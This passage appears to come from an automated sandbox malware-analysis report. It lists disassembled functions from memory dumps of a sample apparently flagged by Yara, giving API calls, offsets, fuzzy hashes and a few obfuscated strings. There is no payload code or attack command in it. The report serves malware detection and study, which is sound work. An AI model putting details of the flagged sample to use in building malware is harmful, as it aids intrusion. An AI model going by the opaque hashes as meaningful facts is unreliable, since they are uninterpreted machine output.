                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                • Instruction ID: d8e0662e495cbf0cbe128227989cdcc52a6003312a18ed6af66c14456b27014d
                                                • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                                                • Instruction Fuzzy Hash: 96216F71300205AFAB24AF7DCC8096B77ADEF442A870485A5E93A97350E734F9018BB0
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 0041844D
                                                  • Part of subcall function 00414F58: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151BB,?,00000000,-00000008), ref: 00414FB9
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00418485
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 004184A5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 158306478-0
                                                • Opcode ID: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                                • Instruction ID: 9202fe00a5822ec58f1db5debff3a6e736622b39abe9cc99b2a2d556b75614f5
                                                • Opcode Fuzzy Hash: 42e04dca39cc9313a1bac36138922e873b2761e214a8738c343e5be4cc190242
                                                • Instruction Fuzzy Hash: A01104B65005167F6B212BB25D89CEF295CDF89398721402EF905A1201FE2CDE8241BE
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,04B736AF,04B637FE,?,00000000,04B62A70,04B62A72,?,04B73828,00000022,00420B0C,00422950,00422958,04B62A70), ref: 04B73661
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID:
                                                • API String ID: 3664257935-0
                                                • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                • Instruction ID: 572158fbaea3e9bfc879e17411d746dadbaa68648cda79434c784f8715c7c2a2
                                                • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                                                • Instruction Fuzzy Hash: 2B21D576B05211ABC7319F25ECC0A5A3BA9DB42760F1511B0ED26A7391EB30FE06E694
                                                APIs
                                                • GetEnvironmentStringsW.KERNEL32 ref: 04B786B4
                                                  • Part of subcall function 04B751BF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04B75422,?,00000000,-00000008), ref: 04B75220
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04B786EC
                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 04B7870C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                • String ID:
                                                • API String ID: 158306478-0
                                                • Opcode ID: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                                • Instruction ID: ca7c5e5a463636d8edb597a4d8a4d765bb59340f3423c9fdf4ee96ab6c69769e
                                                • Opcode Fuzzy Hash: f25717e6bd25f80c70edce058ac37b14eb42a5c51d25e47d03568e648881f521
                                                • Instruction Fuzzy Hash: FB1192B6A016197E77213B725CCCCBF7DADDE891D870104B4F926E6100FA60EE0291B6
                                                APIs
                                                • GetLastError.KERNEL32(?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006EA1
                                                • _free.LIBCMT ref: 10006EFE
                                                • _free.LIBCMT ref: 10006F34
                                                • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,00000000,100059DF,?,10001F4F,00000000), ref: 10006F3F
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                • Instruction ID: 52538b18816049bcedc1269911990ba1ec418b01f35f7c97631a1a3369067357
                                                • Opcode Fuzzy Hash: 72c61705ed6df8d98b2a0eedb55838999870745f68928b586d93f1ef3c7b0de2
                                                • Instruction Fuzzy Hash: BE11E33AA006566AF242D674DC81E6F328BEBC92F57310134F528921D9DE74DE094631
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,1000592B,10007A62,?,?,100066F0), ref: 10006FF8
                                                • _free.LIBCMT ref: 10007055
                                                • _free.LIBCMT ref: 1000708B
                                                • SetLastError.KERNEL32(00000000,0000000B,000000FF,?,?,1000592B,10007A62,?,?,100066F0), ref: 10007096
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                • Instruction ID: 7e0a2054198a3f627b51ebbd791d94cb99ce3d76a099f8cfcb9b0e2a4681bd24
                                                • Opcode Fuzzy Hash: cb1c894d2cda448839c8e2a8665fbefda6a0446c15ff34be0ccd710a5c402308
                                                • Instruction Fuzzy Hash: B8110236E00514AAF352C6748CC5E6F328AFBC92F17210724F52C921EADE79DE048631
                                                APIs
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 04D0ADA0
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 04D0ADB9
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Value___vcrt_
                                                • String ID:
                                                • API String ID: 1426506684-0
                                                • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction ID: f7843e2fb899912db9a9cc4b2dd996d079f34fc9236902377943b3a1eb3cbf7c
                                                • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                                                • Instruction Fuzzy Hash: B301B53230D3119EE73427B86CC4B5F2B54FB11279360823AE510572E1FE95A84255E8
                                                APIs
                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000), ref: 0041CBFF
                                                • GetLastError.KERNEL32(?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000,?,0041A021,?), ref: 0041CC0B
                                                  • Part of subcall function 0041CBD1: CloseHandle.KERNEL32(FFFFFFFE,0041CC1B,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000,00000000), ref: 0041CBE1
                                                • ___initconout.LIBCMT ref: 0041CC1B
                                                  • Part of subcall function 0041CB93: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0041CBC2,0041C84C,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CBA6
                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,0041C85F,00000000,00000001,?,00000000,?,00419A7E,00000000,00000000,00000000,00000000), ref: 0041CC30
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                • Instruction ID: b2f8e5e77f4d676ad0e685e0439cc39e0844638a97b8ad054d7e4805cd8d945f
                                                • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                • Instruction Fuzzy Hash: D6F01C36580118BBCF221F95ED45ADA3F26FF497A0B404031FA0D96121D6328C619BD8
                                                APIs
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001), ref: 1000CD39
                                                • GetLastError.KERNEL32(?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001,?,1000BFFB,10009A1A), ref: 1000CD45
                                                  • Part of subcall function 1000CD0B: CloseHandle.KERNEL32(FFFFFFFE,1000CD55,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?,00000001), ref: 1000CD1B
                                                • ___initconout.LIBCMT ref: 1000CD55
                                                  • Part of subcall function 1000CCCD: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,1000CCFC,1000C7D5,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CCE0
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,1000C7E8,?,00000001,?,00000001,?,1000BAAF,?,?,00000001,?), ref: 1000CD6A
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                • Instruction ID: e182fa176b596d651ba3484f1012657cf00b5fef4cb1dd311ab1bc31a0a6f155
                                                • Opcode Fuzzy Hash: 2cecfe65eba2e63a17b5684705d35a016e8c273fc96426fc022e5dbf763bb7f4
                                                • Instruction Fuzzy Hash: 53F030368002A9BBEF125F95CC48EC93FA6FB0D3E0F018025FA0885130DA32C9609B90
                                                APIs
                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,04B7CAC6,00000000,00000001,?,00000000,?,04B79CE5,00000000,00000000,00000000), ref: 04B7CE66
                                                • GetLastError.KERNEL32(?,04B7CAC6,00000000,00000001,?,00000000,?,04B79CE5,00000000,00000000,00000000,00000000,00000000,?,04B7A288,?), ref: 04B7CE72
                                                  • Part of subcall function 04B7CE38: CloseHandle.KERNEL32(0042CA30,04B7CE82,?,04B7CAC6,00000000,00000001,?,00000000,?,04B79CE5,00000000,00000000,00000000,00000000,00000000), ref: 04B7CE48
                                                • ___initconout.LIBCMT ref: 04B7CE82
                                                  • Part of subcall function 04B7CDFA: CreateFileW.KERNEL32(00428728,40000000,00000003,00000000,00000003,00000000,00000000,04B7CE29,04B7CAB3,00000000,?,04B79CE5,00000000,00000000,00000000,00000000), ref: 04B7CE0D
                                                • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,04B7CAC6,00000000,00000001,?,00000000,?,04B79CE5,00000000,00000000,00000000,00000000), ref: 04B7CE97
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                • Instruction ID: c81a9a165e413af1b1b2110292bab425c105fecd6cb466205c5ff462374140f2
                                                • Opcode Fuzzy Hash: e3757025193b1f655bc0a77c3c1a7d52d6e2513ac00293883d9defc3f3400d05
                                                • Instruction Fuzzy Hash: 7BF0303A500118BBCF325F95DC04ACD3F36FF086A1B408474FA2996130D732E821ABD5
                                                APIs
                                                • SleepConditionVariableCS.KERNELBASE(?,00409CAA,00000064), ref: 00409D30
                                                • LeaveCriticalSection.KERNEL32(0042D064,00401044,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D3A
                                                • WaitForSingleObjectEx.KERNEL32(00401044,00000000,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D4B
                                                • EnterCriticalSection.KERNEL32(0042D064,?,00409CAA,00000064,?,?,?,00401044,0042DA8C), ref: 00409D52
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                                • String ID:
                                                • API String ID: 3269011525-0
                                                • Opcode ID: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                                • Instruction ID: ed1c7c09b24d5124ebc712e1e7f2573f2e40a4f9289d25860d0ee5ca28a3c269
                                                • Opcode Fuzzy Hash: 203c7f3a807ec8057ea0aa5072313220b9e23051332dfe18f360eb7747514d6b
                                                • Instruction Fuzzy Hash: 8FE0ED31A85628FBCB111B50FC09AD97F24AF09759F508032F90976171C7795D039BDD
                                                APIs
                                                • _free.LIBCMT ref: 100067F1
                                                  • Part of subcall function 10007A3C: RtlFreeHeap.NTDLL(00000000,00000000,?,100066F0), ref: 10007A52
                                                  • Part of subcall function 10007A3C: GetLastError.KERNEL32(?,?,100066F0), ref: 10007A64
                                                • _free.LIBCMT ref: 10006804
                                                • _free.LIBCMT ref: 10006815
                                                • _free.LIBCMT ref: 10006826
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                • Instruction ID: 2a5a278bef7b5ad6e03033ca92f6b3e0bb2fc7991e1f46602c590ec50041d4ba
                                                • Opcode Fuzzy Hash: debb3193547cbbcb7717f1e4cdc42473b8e46860ea64e0849bed9af40c6c58a4
                                                • Instruction Fuzzy Hash: FBE0E675D10131BAF711EF249C8644E3FA1F799A503068015F528222B7C7369751DFE3
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMT ref: 004096CE
                                                • std::_Xinvalid_argument.LIBCPMT ref: 004096E5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: Concurrency::cancel_current_taskXinvalid_argumentstd::_
                                                • String ID: vector too long
                                                • API String ID: 3646673767-2873823879
                                                • Opcode ID: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                                • Instruction ID: f4da2a5e80598445161bac14147e50f437b92e93805fe79093e1120e4695fd56
                                                • Opcode Fuzzy Hash: 76399865d75423f55fc174df7396f940014b7bb3f785ca2fba6546e7ea2eb098
                                                • Instruction Fuzzy Hash: 5A5125B2E002159BCB14DF69C84066EB7A5EF80314F10067FE805FB382EB75AD408BD5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\file.exe
                                                • API String ID: 0-3695852857
                                                • Opcode ID: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                • Instruction ID: cc2ecb4b5d0b55cd4a25e2381517e3645a439caaa5f14caae8cc7f97f4731dcb
                                                • Opcode Fuzzy Hash: 4a8ba0bb3459913fcd586df3a76a6e4d0e3c9f4097a590b62cd75fbc9ff119e1
                                                • Instruction Fuzzy Hash: 9241AD75E00215BBEB11CB99CC8199FBBF9EF89390B244066F901A7216D6719B80CB90
                                                APIs
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 04B6BA66
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 04B6BB1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 3480331319-1018135373
                                                • Opcode ID: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction ID: f2f8526e44dca3677b544f1797a4f8c4db6d6becd238956391975d838c59c261
                                                • Opcode Fuzzy Hash: 5641a44dda4cb41aef4b567e19f678f9a0ce6225873a8c2651de762a4506a773
                                                • Instruction Fuzzy Hash: 6F41B630A042289BDF10DF68C884A9EBBB5FF45318F14C1D5E8169B391DB79FA16CB91
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0040C085
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                • Instruction ID: fbbd96fe11317218043276dd35bf9a0f08be73a273ccdb2477d392fe495d2932
                                                • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                • Instruction Fuzzy Hash: EC414972900209EFCF15DF94CD81AAEBBB5BF48304F14826AF9057B2A2D3399951DF58
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?), ref: 100044FB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880988260.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2880965308.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881015345.0000000010011000.00000002.00001000.00020000.00000000.sdmp
                                                • Associated: 00000000.00000002.2881069873.0000000010018000.00000004.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_file.jbxd
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                • Instruction ID: 0fa13f4c886c2deeb8e1184eea68dc96f9460117e0f406c7378fe553058e7938
                                                • Opcode Fuzzy Hash: ca9cd7b99e72cbf3783ae7526526635f66225abf8acecb3cb58be7c4c4c22851
                                                • Instruction Fuzzy Hash: 7B419DB5900109AFEF06CF94CC81AEE7BB5FF48384F168059F9046B25AD736EA50CB55
                                                APIs
                                                • RtlEncodePointer.NTDLL(00000000), ref: 04B6C2EC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                • Instruction ID: 917589a17fa48d0c0117c867cbdd4a58963f7d51df9dc502e855e3b9743bc4ae
                                                • Opcode Fuzzy Hash: dec2c1a8c1fc86745a31a1a2a9fa5c906894c1295ee00ff621ec7b5f648f62df
                                                • Instruction Fuzzy Hash: 21412A71900149EFDF25DF98C980AEE7BB5FF48304F148499E95AA7211D239A950DB50
                                                APIs
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 0040138C
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                • String ID: KN$]DFE
                                                • API String ID: 2296764815-873640922
                                                • Opcode ID: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                                • Instruction ID: c7a597aca517c447b6d362385d7579deaaf1cbe7f5b4030a5a3b5ced69f100f5
                                                • Opcode Fuzzy Hash: d6f8056c27549fa5a6288615fe1556662b6743ffa200569e1178aac9022ea53a
                                                • Instruction Fuzzy Hash: 57210CB0F00384CAE724DF64E8467B9B760AF19308F44827AF8546B2B2D77855C2CB5D
                                                APIs
                                                • __Init_thread_footer.LIBCMT ref: 04D0078C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000003.2398971584.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, Offset: 04D00000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_3_4d00000_file.jbxd
                                                Similarity
                                                • API ID: Init_thread_footer
                                                • String ID: KN$]DFE
                                                • API String ID: 1385522511-873640922
                                                • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                                • Instruction ID: 4293d956b2bdec09bda07c90788e28a8d8ae93ca3f322661f7380e5c78bad685
                                                • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                                • Instruction Fuzzy Hash: E82128B0F00244DAE720EF64E8557A9B760EF59308F44C269E4541B2A1EB7461C2CF5D
                                                APIs
                                                  • Part of subcall function 04B69EEC: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EF7
                                                  • Part of subcall function 04B69EEC: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69F34
                                                • __Init_thread_footer.LIBCMT ref: 04B615F3
                                                  • Part of subcall function 04B69EA2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04B69EAC
                                                  • Part of subcall function 04B69EA2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04B69EDF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2880065778.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_4b60000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$Init_thread_footer
                                                • String ID: KN$]DFE
                                                • API String ID: 4132704954-873640922
                                                • Opcode ID: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                                • Instruction ID: b23fc70bfc34c276a891f5aea97341a47f012d0c7fb13a45681226f85e14eade
                                                • Opcode Fuzzy Hash: c7f53b009e95d7dd01e5f31d15fda14bb4db076080706df986ab624f9e59cbce
                                                • Instruction Fuzzy Hash: 05213CF0F00284CAE724EF68E8457A4B770EF1A308F84C2A5E4561B261DB7966C6CF5D
                                                APIs
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 0040847E
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2877015392.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                                                • String ID: CD^O$_DC[
                                                • API String ID: 2296764815-3597986494
                                                • Opcode ID: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                                • Instruction ID: e43b8a85f3d3021ebc641e50c070c1ece00a7f90a8480fa311e7b242f9d929d7
                                                • Opcode Fuzzy Hash: 399a8b999e5772a2d09049cbf9d260b7606379017b1484e9f9d8dab40e033c4e
                                                • Instruction Fuzzy Hash: A0012B70F04258CBC720EBB9AD41A5D7360A718304F50017ED51467381EB789941878D
                                                APIs
                                                  • Part of subcall function 00409C85: EnterCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409C90
                                                  • Part of subcall function 00409C85: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,00401044,0042DA8C), ref: 00409CCD
                                                • __Init_thread_footer.LIBCMT ref: 00407EBE
                                                  • Part of subcall function 00409C3B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C45
                                                  • Part of subcall function 00409C3B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401079,0042DA8C,0041DC90), ref: 00409C78
                                                  • Part of subcall function 00409C3B: RtlWakeAllConditionVariable.NTDLL ref: 00409CEF
                                                Strings
                                                Memory Dump Source
